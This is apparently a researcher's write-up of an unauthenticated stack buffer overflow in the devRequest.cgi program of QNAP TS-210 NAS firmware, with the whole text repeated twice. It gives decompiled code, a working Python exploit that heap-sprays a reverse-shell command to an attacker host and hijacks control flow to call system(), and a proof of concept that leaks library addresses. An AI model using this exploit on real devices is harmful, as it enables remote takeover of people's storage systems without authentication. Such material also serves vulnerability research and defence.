crixpwn/QNAP TS_210 stack based buffer overflow.txt

## QNAP TS_210 stack based buffer overflow.txt

I recently noticed a bug in QNAP. I have patched this bug on the latest patch. (I did not report it.) My environment was TS-210 and the vulnerability was in devRequest.cgi

And this bug does not require authentication by default.

  v0 = CGI_Get_Input();
  dword_27FEC = v0;
  v1 = CGI_Find_Parameter(v0, "todo");
  if ( v1 && !strcmp(*(const char **)(v1 + 4), "get_keyfile") && (v2 = CGI_Find_Parameter(dword_27FEC, "password")) != 0 )
  {
    Encode_External_key(*(_DWORD *)(v2 + 4), (int)&v21);

This code indicates that the password argument is used as an argument to the Encode_External_key function.

int _fastcall Encode_External_key (int a1, char * a2)
{
  char * dest; // ST00_4
  int v4; // [sp + 8h] [bp-414h]
  int v5; // [sp + 40Ch] [bp-10h]

  dest = a2;
  v5 = Encode_User_Key_Ex ((char *) a1);
  strncpy (dest, (const char *) & v4, 0x404u);

This function calls the Encode_User_Key_Ex function again.

signed int __fastcall Encode_User_Key_Ex(char *a1, char *a2)
{
  int v3; // [sp+4h] [bp-238h]
  char *s; // [sp+10h] [bp-22Ch]
  const char *src; // [sp+14h] [bp-228h]
  __int16 v7; // [sp+1Eh] [bp-21Eh]
  char v8; // [sp+11Fh] [bp-11Dh]
  int v9; // [sp+220h] [bp-1Ch]
  int i; // [sp+224h] [bp-18h]
  int j; // [sp+228h] [bp-14h]
  void *ptr; // [sp+22Ch] [bp-10h]
  char v13[12]; // [sp+230h] [bp-Ch]

  src = a1;
  s = a2;
  ptr = 0;
  if ( !a1 )
    return -1;
  ptr = calloc(1u, 257u);
  if ( !ptr )
    return -1;
  strcpy(&v8, src);
  v9 = strlen(&v8);

And we can confirm that there is a stack overflow by strcpy function in Encode_User_Key_Ex.

Here is the exploit code. Basically, there are aslr, NX.

SP register is modulated by LDMFD SP, {R11, SP, PC}. So we could not use the POP gadget unless we knew the address on the stack, and we used Heapspary after all. (This is possible because the parameters received by the user are stored in the heap!)

Here is the exploit code.

import struct
import requests

def main ():
  with requests.Session () as s:
    payload = "A" * 273
    payload + = struct.pack ("<I", 0xb63cd111) * 2 # this is heap address
    payload + = struct.pack ("<I", 0x126BC) # call system function

    #uid is parameter for heap spary and system arg
    params = {"todo": "get_keyfile", "password": payload, "uid": "sh -i> & /dev/tcp/attacker's ip/port 0> & 1;" * 0x10000}
    s.post ("http://ip:8080/cgi-bin/devices/devRequest.cgi", params)

if __name __ == '__ main__':
  main ()

There is other bugs that can libc leak:

  v1 = CGI_Find_Parameter(v0, "todo");
  if ( v1 && !strcmp(*(const char **)(v1 + 4), "get_keyfile") && (v2 = CGI_Find_Parameter(dword_27FEC, "password")) != 0 )
  {
    Encode_External_key(*(_DWORD *)(v2 + 4), (int)&v21);
    v3 = CGI_Find_Parameter(dword_27FEC, "uid");
    if ( v3 )
      strncpy(&v22, *(const char **)(v3 + 4), 0x101u);
    printf("Content-Disposition: attachment;filename=%s.key\n", &v22);
    printf("Content-type: application/unknown%c%c%c%c");
    puts(&v21);
    }

The strncpy function should be used by default as follows: strncpy(dest, str, dest - 1). Otherwise, it can cause a bug. Unfortunately, this is the case. The stack area contains the library address, and the library address can be obtained via printf("Content-Disposition: attachment;filename=%s.key\n", &v22);

The following is the PoC code.

import requests
from pwn import *

def leak():
	params = {"todo" : "get_keyfile", "password" : "passw0rd", "uid" : "A" * 0x500000}
	r = s.post("http://ip:8080/cgi-bin/devices/devRequest.cgi", params=params)

	leak = r.headers['Content-Disposition']
	leak = leak.split("A" * 0x101)[1]
	leak = u32(leak[0:4])
	libc = leak - 128536

	log.info("leak: " + hex(leak))
	log.info("ld-2.5.so base: " + hex(libc))


Note:
- You can get the address of all libraries as well as the ld-2.5.so library.
- 4.2.6 build Valid for versions below 20170905.
- contact @pwning_me on twitter

	I recently noticed a bug in QNAP. I have patched this bug on the latest patch. (I did not report it.) My environment was TS-210 and the vulnerability was in devRequest.cgi

	And this bug does not require authentication by default.

	v0 = CGI_Get_Input();
	dword_27FEC = v0;
	v1 = CGI_Find_Parameter(v0, "todo");
	if ( v1 && !strcmp((const char *)(v1 + 4), "get_keyfile") && (v2 = CGI_Find_Parameter(dword_27FEC, "password")) != 0 )
	{
	Encode_External_key((_DWORD )(v2 + 4), (int)&v21);

	This code indicates that the password argument is used as an argument to the Encode_External_key function.

	int _fastcall Encode_External_key (int a1, char * a2)
	{
	char * dest; // ST00_4
	int v4; // [sp + 8h] [bp-414h]
	int v5; // [sp + 40Ch] [bp-10h]

	dest = a2;
	v5 = Encode_User_Key_Ex ((char *) a1);
	strncpy (dest, (const char *) & v4, 0x404u);

	This function calls the Encode_User_Key_Ex function again.

	signed int __fastcall Encode_User_Key_Ex(char a1, char a2)
	{
	int v3; // [sp+4h] [bp-238h]
	char *s; // [sp+10h] [bp-22Ch]
	const char *src; // [sp+14h] [bp-228h]
	__int16 v7; // [sp+1Eh] [bp-21Eh]
	char v8; // [sp+11Fh] [bp-11Dh]
	int v9; // [sp+220h] [bp-1Ch]
	int i; // [sp+224h] [bp-18h]
	int j; // [sp+228h] [bp-14h]
	void *ptr; // [sp+22Ch] [bp-10h]
	char v13[12]; // [sp+230h] [bp-Ch]

	src = a1;
	s = a2;
	ptr = 0;
	if ( !a1 )
	return -1;
	ptr = calloc(1u, 257u);
	if ( !ptr )
	return -1;
	strcpy(&v8, src);
	v9 = strlen(&v8);

	And we can confirm that there is a stack overflow by strcpy function in Encode_User_Key_Ex.

	Here is the exploit code. Basically, there are aslr, NX.

	SP register is modulated by LDMFD SP, {R11, SP, PC}. So we could not use the POP gadget unless we knew the address on the stack, and we used Heapspary after all. (This is possible because the parameters received by the user are stored in the heap!)

	Here is the exploit code.

	import struct
	import requests

	def main ():
	with requests.Session () as s:
	payload = "A" * 273
	payload + = struct.pack ("<I", 0xb63cd111) * 2 # this is heap address
	payload + = struct.pack ("<I", 0x126BC) # call system function

	#uid is parameter for heap spary and system arg
	params = {"todo": "get_keyfile", "password": payload, "uid": "sh -i> & /dev/tcp/attacker's ip/port 0> & 1;" * 0x10000}
	s.post ("http://ip:8080/cgi-bin/devices/devRequest.cgi", params)

	if __name __ == '__ main__':
	main ()

	There is other bugs that can libc leak:

	v1 = CGI_Find_Parameter(v0, "todo");
	if ( v1 && !strcmp((const char *)(v1 + 4), "get_keyfile") && (v2 = CGI_Find_Parameter(dword_27FEC, "password")) != 0 )
	{
	Encode_External_key((_DWORD )(v2 + 4), (int)&v21);
	v3 = CGI_Find_Parameter(dword_27FEC, "uid");
	if ( v3 )
	strncpy(&v22, (const char *)(v3 + 4), 0x101u);
	printf("Content-Disposition: attachment;filename=%s.key\n", &v22);
	printf("Content-type: application/unknown%c%c%c%c");
	puts(&v21);
	}

	The strncpy function should be used by default as follows: strncpy(dest, str, dest - 1). Otherwise, it can cause a bug. Unfortunately, this is the case. The stack area contains the library address, and the library address can be obtained via printf("Content-Disposition: attachment;filename=%s.key\n", &v22);

	The following is the PoC code.

	import requests
	from pwn import *

	def leak():
	params = {"todo" : "get_keyfile", "password" : "passw0rd", "uid" : "A" * 0x500000}
	r = s.post("http://ip:8080/cgi-bin/devices/devRequest.cgi", params=params)

	leak = r.headers['Content-Disposition']
	leak = leak.split("A" * 0x101)[1]
	leak = u32(leak[0:4])
	libc = leak - 128536

	log.info("leak: " + hex(leak))
	log.info("ld-2.5.so base: " + hex(libc))


	Note:
	- You can get the address of all libraries as well as the ld-2.5.so library.
	- 4.2.6 build Valid for versions below 20170905.
	- contact @pwning_me on twitter